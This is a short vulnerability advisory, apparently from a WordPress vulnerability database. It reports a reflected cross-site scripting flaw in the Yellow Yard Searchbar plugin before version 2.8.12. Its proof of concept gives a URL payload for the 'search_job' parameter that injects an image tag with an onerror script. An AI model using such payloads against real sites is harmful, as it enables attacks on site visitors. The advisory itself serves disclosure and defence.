WordPress Plugin Vulnerabilities
Yellow Yard Searchbar < 2.8.12 - Reflected Cross-Site Scripting
Description
The plugin does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting
Proof of Concept
On a page where the yy_filter shortcode is embed, append /?search_job="><img+src%3Dx+onerror%3Djavascript%3Aalert%28%60HoiWPScan%60%29>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Victor Pasman
Submitter
Victor Pasman
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-07-01 (about 1 years ago)
Added
2022-07-01 (about 1 years ago)
Last Updated
2023-04-12 (about 1 years ago)